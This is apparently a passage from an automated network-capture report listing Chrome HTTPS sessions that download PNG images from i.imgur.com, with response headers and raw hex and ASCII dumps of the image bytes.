0f 01 00 00 c0 40 84 3f 4a 10 04 81 a5 eb b3 75 7f 41 41 c1 dc b9 73 17 2c 58 50 52 52 62 32 99 ec 76 bb cf e7 ab ed 27 b3 d5 3c fd 49 Data Ascii: 4S@P,.{do#G.@5yhbmlES'###55h4+ObD<gLy$(.X`N~G@}$+Fc?>HQ3g;GKtk-i{K<Wz>Xf{FU@?JuAAs,XPRRb2v'<I
2025-03-20 22:53:01 UTC	1371	IN	Data Raw: 15 15 15 4c ec 03 a6 22 32 1f 3f 1d 4c 66 01 83 c1 30 7a f4 e8 f1 e3 c7 a7 a5 a5 85 6f c0 00 00 d0 a0 81 ea 47 1c 14 ee 0e 78 d8 a2 45 8b c6 8c 19 53 5c 5c 1c c2 3f c1 8a dd 5a ad 56 9f cf c7 71 5c db b6 6d 37 6e dc 18 17 17 67 b3 d9 2a 25 de 87 1b 51 14 1f 79 e4 91 ff fd df ff 25 39 3f 7f fe 7c b5 c2 1f 8c 8f df 6c 36 0f 1c 38 70 da b4 69 e4 33 84 9d 0f 00 00 2a 81 08 7f c4 11 8c dc 2e 5c b8 70 fa f4 e9 05 05 05 54 0a b7 b6 9f 4f 85 71 52 52 52 68 b9 7c e7 9d 77 fe f3 9f ff 6c d2 a4 09 49 be 7a 27 5e dd cb 27 4c 18 8d c6 56 ad 5a 71 1c 97 9d 9d 5d 5e 5e 6e b5 5a 5d 2e 97 db ed b6 58 2c ea 7f 9d 02 fb 26 93 a9 a6 3a 04 e4 e3 3f 79 f2 a4 ba 1f 3f 6b 4a 04 00 00 00 aa df 90 20 09 14 45 f1 bd f7 de 9b 3c 79 72 7e 7e be d9 6c 0e c1 94 4f da 69 b3 d9 4a 4b 4b Data Ascii: L"2?Lf0zoGxES\\?ZVq\m7ng%Qy%9?\|l68pi3.\pTOqRRRh\|wlIz'^'LVZq]^^nZ].X,&:?y?kJ E<yr~~lOiJKK
2025-03-20 22:53:01 UTC	1371	IN	Data Raw: ab 55 c7 53 a9 4b a8 83 0e f9 f8 3d 1e cf d1 a3 47 7d 3e 1f 2d f4 59 25 c1 9a 36 f5 69 cb 9f 22 25 54 9e 48 14 45 af d7 0b 1f 3f 00 20 36 81 73 2f 52 c8 cb cb 9b 32 65 ca 47 1f 7d 44 5e 3b e1 02 06 83 21 2e 2e 4e 14 45 ed 7d 7d 52 7d 52 3e 2a 64 6b 36 9b 37 6e dc d8 b5 6b 57 1d cf 40 0f 3c 1e cf 8d 37 de b8 7d fb 76 b7 db cd f3 3c c9 79 40 1f bf c3 e1 50 14 85 fe 1f da 6c 36 56 d9 10 3e 7e 00 40 ac d1 90 12 bb 1a 28 1a cb 50 b6 7c cf ce ce 1e 39 72 e4 a2 45 8b e8 4f b7 db cd 5e 2a 2b 2b 23 b9 aa 94 9f cf 48 48 48 20 f7 5a 7c 7c 3c 6d ed f7 ee dd fb b7 df 7e 8b 3e c9 a7 3a 45 1b 36 6c e8 df bf 3f ed 59 24 24 24 50 be 82 c5 62 a9 94 a5 68 34 1a d9 8e 86 db ed 66 d3 26 af d7 cb be 91 05 0b 16 8c 1e 3d fa d0 a1 43 f4 67 08 e5 8d 01 00 a0 61 81 08 7f d8 d1 b0 Data Ascii: USK=G}>-Y%6i"%THE? 6s/R2eG}D^;!..NE}}R}R>dk67nkW@<7}v<y@Pl6V>~@(P\|9rEO^++#HHH Z\|\|<m~>:E6l?Y$$$Pbh4f&=Cga
2025-03-20 22:53:01 UTC	1371	IN	Data Raw: de 7d fb f6 29 8a 02 1f 3f 00 a0 a1 03 bf 7e 18 f9 f5 d7 5f 6f bf fd f6 b3 67 cf 5a 2c 16 5a af d3 da 5d 92 24 9b cd a6 b1 bb cf 1c e7 f4 20 21 21 a1 57 af 5e 2b 57 ae b4 d9 6c fa 9e 41 83 27 64 1f bf 24 49 34 45 a3 5a fd 34 f7 1a 37 6e dc d8 b1 63 d5 7b fc 55 d3 36 01 00 20 92 81 25 a9 8e 61 8b f8 8d 1b 37 0e 1b 36 ec ec d9 b3 a4 3d 34 bb 12 45 91 84 87 49 3e 2b a7 4f e9 7b 1c c7 31 3b 7e 42 42 02 3d b8 f3 ce 3b 21 f9 a1 51 93 8f 9f 59 f6 09 da 55 61 fa 5d 5e 5e ce ea 28 78 3c 1e f6 9d be f6 da 6b 23 47 8e 3c 72 e4 08 fd 29 08 02 24 1f 00 d0 b0 40 84 bf 2e 51 14 85 dc f6 bb 76 ed 9a 31 63 c6 fa f5 eb 2d 16 8b 76 8d 17 16 6b 61 f6 3c 2a ba 27 cb b2 c7 e3 31 9b cd 4f 3e f9 e4 c8 91 23 11 58 0e 19 f2 f1 cb b2 bc 77 ef 5e b7 db 6d b7 db 5d 2e 97 db ed 66 33 Data Ascii: })?~_ogZ,Z]$ !!W^+WlA'd$I4EZ47nc{U6 %a76=4EI>+O{1;~BB=;!QYUa]^^(x<k#G<r)$@.Qv1c-vka<*'1O>#Xw^m].f3
2025-03-20 22:53:01 UTC	1371	IN	Data Raw: 7e f8 e1 a1 87 1e ca cb cb a3 4b ba ac ac 4c 96 65 9e e7 99 c3 48 92 24 9f cf 47 9e 94 a2 a2 a2 23 47 8e dc 73 cf 3d f5 3d 70 10 5e a0 fa a1 40 92 ff eb af bf 4e 99 32 e5 f0 e1 c3 d4 2f a7 b6 6e 08 12 92 c7 1e 7b 6c c6 8c 19 b4 59 00 c9 d7 19 b5 8f bf 7b f7 ee 65 65 65 db b7 6f af ad 8f df 64 32 09 82 a0 f6 f1 53 3f 7e f8 f8 41 fd b2 7c f9 f2 91 23 47 16 14 14 50 6b 69 ba e1 a8 a7 b0 74 db 61 7d a4 14 45 39 78 f0 e0 ed b7 df de a4 49 93 7a 1d 38 08 2f 50 fd 5a 43 e1 fd a2 a2 a2 59 b3 66 ad 5e bd 3a 98 ce ad d5 62 b1 58 ee bd f7 de 09 13 26 20 1a 5c bf d0 8e 7e 72 72 72 68 3e 7e 93 c9 44 0d 96 d4 3e fe 9c 9c 1c ea c7 0f 1f 3f d0 1f bf df bf 6c d9 b2 b9 73 e7 ee dd bb 97 d5 0e b1 58 2c 0e 87 83 1e 3b 9d 4e 8a 35 92 9f 85 2e 60 45 51 44 51 6c d4 a8 51 bf 7e Data Ascii: ~KLeH$G#Gs==p^@N2/n{lY{eeeod2S?~A\|#GPkita}E9xIz8/PZCYf^:bX& \~rrrh>~D>?lsX,;N5.`EQDQlQ~
2025-03-20 22:53:01 UTC	1371	IN	Data Raw: 6a fd e6 9b 6f d8 ce 3d 68 88 f8 fd 7e 56 a2 3c 21 21 81 1e b0 0a 3f 44 25 1f bf 06 c3 86 0d a3 8f ad a8 a8 a8 ef 33 03 0d 92 a5 4b 97 a6 a7 a7 53 05 1e 8d 2b 8d 5d a2 64 3d 65 8f 0d 06 43 62 62 22 bd da ae 5d bb e5 cb 97 d7 f7 09 01 9d 40 84 3f 00 54 63 67 e5 ca 95 9f 7f fe 39 f9 f4 6a 82 b5 cd 65 6d 2d 98 cb 6b e4 c8 91 0f 3f fc b0 d5 6a 85 71 ab e1 c2 f3 7c cb 96 2d 65 59 56 f7 e3 77 bb dd b5 ed c7 4f 1c 3b 76 4c 92 a4 bf fd ed 6f b4 4f 84 fd 1d 50 2b 96 2e 5d 3a 6d da b4 c3 87 0f 07 ac f3 a1 76 99 b2 c7 1c c7 c5 c7 c7 9f 3f 7f 5e 96 e5 ac ac ac d1 a3 47 df 7d f7 dd b8 08 63 85 fa 9e 76 44 34 1e 8f 47 51 94 bc bc bc 9b 6f be 99 fe 77 69 af f5 69 e2 4c 3d 57 d8 cc ba 53 a7 4e c7 8e 1d ab ef 53 01 75 c3 a1 43 87 fe eb bf fe 8b be 6e 5a 63 31 81 57 5f 1b Data Ascii: jo=h~V<!!?D%3KS+]d=eCbb"]@?Tcg9jem-k?jq\|-eYVwO;vLoOP+.]:mv?^G}cvD4GQowiiL=WSNSuCnZc1W_
2025-03-20 22:53:01 UTC	1371	IN	Data Raw: be 42 20 a1 3a 36 81 2f 1f 84 15 a8 fe 5f a0 9b f5 d9 b3 67 3f f9 e4 13 ba e7 32 87 2b 9b 44 6b 7f c2 ed b7 df 7e fd f5 d7 ab df 08 a2 1e ea 9a 68 30 18 2e bd f4 d2 71 e3 c6 5d 77 dd 75 21 7c 88 d9 6c ce cb cb 5b b7 6e 5d 18 06 08 1a 12 a1 f5 cb 57 d7 d8 67 21 81 b4 b4 b4 99 33 67 3e f8 e0 83 f4 a7 28 8a 54 6d 0c 61 a4 58 06 aa ff 17 28 b8 fa d5 57 5f 9d 3c 79 92 04 5e dd 4f 5d bb 59 b5 28 8a 8d 1a 35 7a f0 c1 07 69 4a ae ee a3 0f a2 1b 8e e3 58 06 f5 35 d7 5c f3 d0 43 0f a5 a4 a4 d4 f6 43 28 ee fa d5 57 5f 51 55 47 10 83 c0 97 0f 74 00 aa ff 27 14 d2 17 45 71 e5 ca 95 ec c7 43 6d 2a 58 b1 55 ed 39 72 87 0e 1d ae bd f6 5a 0a a3 e9 38 70 50 9f b0 4b 42 10 04 7a 7c d7 5d 77 3d fc f0 c3 b5 fd 1c 59 96 39 8e db b0 61 03 25 6c 83 18 04 be 7c a0 03 50 fd 3f a1 Data Ascii: B :6/_g?2+Dk~h0.q]wu!\|l[n]Wg!3g>(TmaX(W_<y^O]Y(5ziJX5\CC(W_QUGt'EqCm*XU9rZ8pPKBz\|]w=Y9a%l\|P?
2025-03-20 22:53:01 UTC	1371	IN	Data Raw: d0 a0 81 03 07 d2 f3 f0 e5 83 d0 80 ea 1b 28 81 bf 56 de 2a fa 8d 25 24 24 b4 6d db 56 97 01 82 86 8a cf e7 a3 1b 7d 90 f7 65 3a 8c f6 71 c3 3f 3a 10 5e c8 97 bf 7f ff fe b8 b8 38 ca c2 a3 1a ba e4 cb b7 5a ad 54 e6 ab 26 e8 56 c3 56 f9 83 06 0d 1a 3e 7c 38 7b 95 f9 f2 65 59 46 f3 5c 10 3c b8 b3 18 dc 6e 37 f5 d9 a3 1b 6e c0 58 19 a5 ee 1b 0c 86 e1 c3 87 23 b0 06 b4 d9 bb 77 2f b3 60 49 92 a4 a1 e5 14 ec 95 24 89 dc 59 8d 1b 37 d6 77 a4 a1 a0 2d 5a 31 0e f5 cb df bf 7f bf c3 e1 20 c9 af b6 5f 3e 05 17 ab 9d ea c5 c5 c5 91 ea b7 6f df fe bd f7 de 53 4b 3e 03 fd f2 41 6d c1 5a df 70 e8 d0 21 8a b6 a9 db ea 68 37 e0 a1 fb 78 46 46 06 02 6b 40 9b 9c 9c 1c 75 8a b5 46 e5 47 36 83 54 14 25 35 35 55 c7 31 d6 1a 3a 05 ab d5 4a b9 e8 f9 f9 f9 a7 4f 9f 3e 7e fc b8 Data Ascii: (V*%$$mV}e:q?:^8ZT&VV>\|8{eYF\<n7nX#w/`I$Y7w-Z1 _>oSK>AmZp!h7xFFk@uFG6T%55U1:JO>~
2025-03-20 22:53:01 UTC	1371	IN	Data Raw: fa 6a ba ef 87 61 74 b5 a3 ea 52 9e 54 9f e7 79 a3 d1 58 ab 8e c0 91 70 3a 75 88 20 08 6b d7 ae 7d e6 99 67 76 ef de 5d c9 97 af fd 46 b5 2f 9f 24 5f 51 94 aa be 7c 48 3e 08 2b 31 ad fa 05 05 05 da 5b 71 d5 92 96 96 96 98 98 18 9e 11 81 06 cc f6 ed db 47 8d 1a f5 d3 4f 3f 71 1c 17 da ea f6 96 5b 6e c9 cc cc 0c c3 d0 ea 0c 2a bb 4b 45 87 aa 0d 59 57 4b 30 db ff 0d 08 f8 f2 41 83 26 a6 27 95 05 05 05 21 dc 8f d0 5d 17 54 65 d7 ae 5d 2f bf fc f2 f7 df 7f 4f 2d 98 43 88 21 b5 6e dd fa 9e 7b ee 21 d9 88 cc d5 5e a5 08 7f 90 92 1f 4d 84 a3 5f fe 5d 77 dd 45 cf c3 97 0f f4 21 76 af 2d 49 92 42 b8 35 1b 0c 86 66 cd 9a 85 61 38 a0 01 93 97 97 37 65 ca 94 65 cb 96 51 f0 b6 a4 a4 24 84 e2 f3 dd ba 75 23 47 a8 76 ad fe fa 85 75 ac a8 94 8b ae 31 4d 89 26 cf 1e 7c f9 Data Ascii: jatRTyXp:u k}gv]F/$_Q\|H>+1[qGO?q[n*KEYWK0A&'!]Te]/O-C!n{!^M_]wE!v-IB5fa87eeQ$u#Gvu1M&\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.24	60846	199.232.196.193	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:53:02 UTC	386	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:53:02 UTC	756	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Thu, 20 Mar 2025 22:53:02 GMT Age: 2214239 X-Served-By: cache-iad-kiad7000021-IAD, cache-lga21968-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 11253, 1 X-Timer: S1742511182.311455,VS0,VE2 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-20 22:53:02 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-03-20 22:53:02 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-03-20 22:53:02 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
2025-03-20 22:53:02 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-03-20 22:53:02 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.24	60847	199.232.196.193	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:53:02 UTC	386	OUT	GET /KAb5SEy.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:53:02 UTC	757	IN	HTTP/1.1 200 OK Connection: close Content-Length: 48869 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 13:35:05 GMT ETag: "8aa14660517f5460156fccc2199cf83c" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: ZMDtIIYNSizYrfDVWXb5ZuJtkSbNLszxoUAHUCL9zZz9IlMMufkJOg== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Thu, 20 Mar 2025 22:53:02 GMT Age: 2263255 X-Served-By: cache-iad-kjyo7100129-IAD, cache-lga21928-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 14884, 1 X-Timer: S1742511182.311648,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-20 22:53:02 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a7 00 00 02 3e 08 02 00 00 00 0e ee 34 d8 00 00 80 00 49 44 41 54 78 9c ec bd 77 7c 14 e5 da ff bf b3 b3 7d 37 3d 10 0c 3d 94 50 42 11 54 10 8f 22 d6 a3 1e 45 e4 b1 60 45 54 1e 11 45 ba 22 52 45 a4 89 05 eb 51 44 fd 3e 3e a8 14 c1 47 39 08 7a 10 14 50 94 5e 12 6a 28 21 04 48 48 48 d9 36 ed f7 3a 5c fe 6e c7 94 d9 cd 92 9d 6c 76 3f ef 3f 7c 6d 76 67 97 7b dc d9 f9 dc f7 75 5f 9f eb 32 29 8a 62 00 00 00 00 40 0c 60 ac ef 01 00 00 00 00 40 27 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 01 aa 0f 00 00 00 c4 0a 50 7d 00 00 00 20 56 80 ea 03 00 00 00 b1 02 54 1f 00 00 00 88 15 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 Data Ascii: PNGIHDR>4IDATxw\|}7==PBT"E`ETE"REQD>>G9zP^j(!HHH6:\nlv??\|mvg{u_2)b@`@'@b>+@XP} VT@b>+@X
2025-03-20 22:53:02 UTC	1371	IN	Data Raw: 95 de 05 00 00 20 34 f8 a9 53 a7 d6 f7 18 40 1d 50 a9 2c 2e 7b 92 64 d8 ef f7 7f f0 c1 07 6f bf fd f6 91 23 47 2e fe df a2 cf ac a9 05 1f 1d 40 35 79 68 f6 c0 f3 bc c5 62 a9 6d 96 80 d9 6c 16 45 f1 d4 a9 53 1e 8f 27 23 23 23 35 35 d5 68 34 92 2b e1 e2 4f 01 00 00 62 13 44 f8 1b 3c b4 94 67 02 4c 79 fb a4 8e 24 90 a2 28 2e 58 b0 60 ee dc b9 a7 4e 9d ba 98 7f a8 da 9d 7e b5 47 40 7d 24 2b d3 1b f2 05 46 19 00 b4 0b f0 d8 63 8f 8d 1f 3f 1e 8e 3e 00 00 b8 48 a0 fa 51 8e db ed 9e 33 67 ce 82 05 0b ce 9d 3b 47 4b f0 da c6 c9 d5 95 74 6b 82 2d fd 69 7b be ea 4b 3c cf 57 7a 3e 18 58 8e a1 cd 66 7b e0 81 07 46 8e 1c 99 95 95 55 db 0f 01 00 00 c0 40 84 3f 4a 10 04 81 a5 eb b3 75 7f 41 41 c1 dc b9 73 17 2c 58 50 52 52 62 32 99 ec 76 bb cf e7 ab ed 27 b3 d5 3c fd 49 Data Ascii: 4S@P,.{do#G.@5yhbmlES'###55h4+ObD<gLy$(.X`N~G@}$+Fc?>HQ3g;GKtk-i{K<Wz>Xf{FU@?JuAAs,XPRRb2v'<I
2025-03-20 22:53:02 UTC	1371	IN	Data Raw: 15 15 15 4c ec 03 a6 22 32 1f 3f 1d 4c 66 01 83 c1 30 7a f4 e8 f1 e3 c7 a7 a5 a5 85 6f c0 00 00 d0 a0 81 ea 47 1c 14 ee 0e 78 d8 a2 45 8b c6 8c 19 53 5c 5c 1c c2 3f c1 8a dd 5a ad 56 9f cf c7 71 5c db b6 6d 37 6e dc 18 17 17 67 b3 d9 2a 25 de 87 1b 51 14 1f 79 e4 91 ff fd df ff 25 39 3f 7f fe 7c b5 c2 1f 8c 8f df 6c 36 0f 1c 38 70 da b4 69 e4 33 84 9d 0f 00 00 2a 81 08 7f c4 11 8c dc 2e 5c b8 70 fa f4 e9 05 05 05 54 0a b7 b6 9f 4f 85 71 52 52 52 68 b9 7c e7 9d 77 fe f3 9f ff 6c d2 a4 09 49 be 7a 27 5e dd cb 27 4c 18 8d c6 56 ad 5a 71 1c 97 9d 9d 5d 5e 5e 6e b5 5a 5d 2e 97 db ed b6 58 2c ea 7f 9d 02 fb 26 93 a9 a6 3a 04 e4 e3 3f 79 f2 a4 ba 1f 3f 6b 4a 04 00 00 00 aa df 90 20 09 14 45 f1 bd f7 de 9b 3c 79 72 7e 7e be d9 6c 0e c1 94 4f da 69 b3 d9 4a 4b 4b Data Ascii: L"2?Lf0zoGxES\\?ZVq\m7ng%Qy%9?\|l68pi3.\pTOqRRRh\|wlIz'^'LVZq]^^nZ].X,&:?y?kJ E<yr~~lOiJKK
2025-03-20 22:53:02 UTC	1371	IN	Data Raw: ab 55 c7 53 a9 4b a8 83 0e f9 f8 3d 1e cf d1 a3 47 7d 3e 1f 2d f4 59 25 c1 9a 36 f5 69 cb 9f 22 25 54 9e 48 14 45 af d7 0b 1f 3f 00 20 36 81 73 2f 52 c8 cb cb 9b 32 65 ca 47 1f 7d 44 5e 3b e1 02 06 83 21 2e 2e 4e 14 45 ed 7d 7d 52 7d 52 3e 2a 64 6b 36 9b 37 6e dc d8 b5 6b 57 1d cf 40 0f 3c 1e cf 8d 37 de b8 7d fb 76 b7 db cd f3 3c c9 79 40 1f bf c3 e1 50 14 85 fe 1f da 6c 36 56 d9 10 3e 7e 00 40 ac d1 90 12 bb 1a 28 1a cb 50 b6 7c cf ce ce 1e 39 72 e4 a2 45 8b e8 4f b7 db cd 5e 2a 2b 2b 23 b9 aa 94 9f cf 48 48 48 20 f7 5a 7c 7c 3c 6d ed f7 ee dd fb b7 df 7e 8b 3e c9 a7 3a 45 1b 36 6c e8 df bf 3f ed 59 24 24 24 50 be 82 c5 62 a9 94 a5 68 34 1a d9 8e 86 db ed 66 d3 26 af d7 cb be 91 05 0b 16 8c 1e 3d fa d0 a1 43 f4 67 08 e5 8d 01 00 a0 61 81 08 7f d8 d1 b0 Data Ascii: USK=G}>-Y%6i"%THE? 6s/R2eG}D^;!..NE}}R}R>dk67nkW@<7}v<y@Pl6V>~@(P\|9rEO^++#HHH Z\|\|<m~>:E6l?Y$$$Pbh4f&=Cga
2025-03-20 22:53:02 UTC	1371	IN	Data Raw: de 7d fb f6 29 8a 02 1f 3f 00 a0 a1 03 bf 7e 18 f9 f5 d7 5f 6f bf fd f6 b3 67 cf 5a 2c 16 5a af d3 da 5d 92 24 9b cd a6 b1 bb cf 1c e7 f4 20 21 21 a1 57 af 5e 2b 57 ae b4 d9 6c fa 9e 41 83 27 64 1f bf 24 49 34 45 a3 5a fd 34 f7 1a 37 6e dc d8 b1 63 d5 7b fc 55 d3 36 01 00 20 92 81 25 a9 8e 61 8b f8 8d 1b 37 0e 1b 36 ec ec d9 b3 a4 3d 34 bb 12 45 91 84 87 49 3e 2b a7 4f e9 7b 1c c7 31 3b 7e 42 42 02 3d b8 f3 ce 3b 21 f9 a1 51 93 8f 9f 59 f6 09 da 55 61 fa 5d 5e 5e ce ea 28 78 3c 1e f6 9d be f6 da 6b 23 47 8e 3c 72 e4 08 fd 29 08 02 24 1f 00 d0 b0 40 84 bf 2e 51 14 85 dc f6 bb 76 ed 9a 31 63 c6 fa f5 eb 2d 16 8b 76 8d 17 16 6b 61 f6 3c 2a ba 27 cb b2 c7 e3 31 9b cd 4f 3e f9 e4 c8 91 23 11 58 0e 19 f2 f1 cb b2 bc 77 ef 5e b7 db 6d b7 db 5d 2e 97 db ed 66 33 Data Ascii: })?~_ogZ,Z]$ !!W^+WlA'd$I4EZ47nc{U6 %a76=4EI>+O{1;~BB=;!QYUa]^^(x<k#G<r)$@.Qv1c-vka<*'1O>#Xw^m].f3
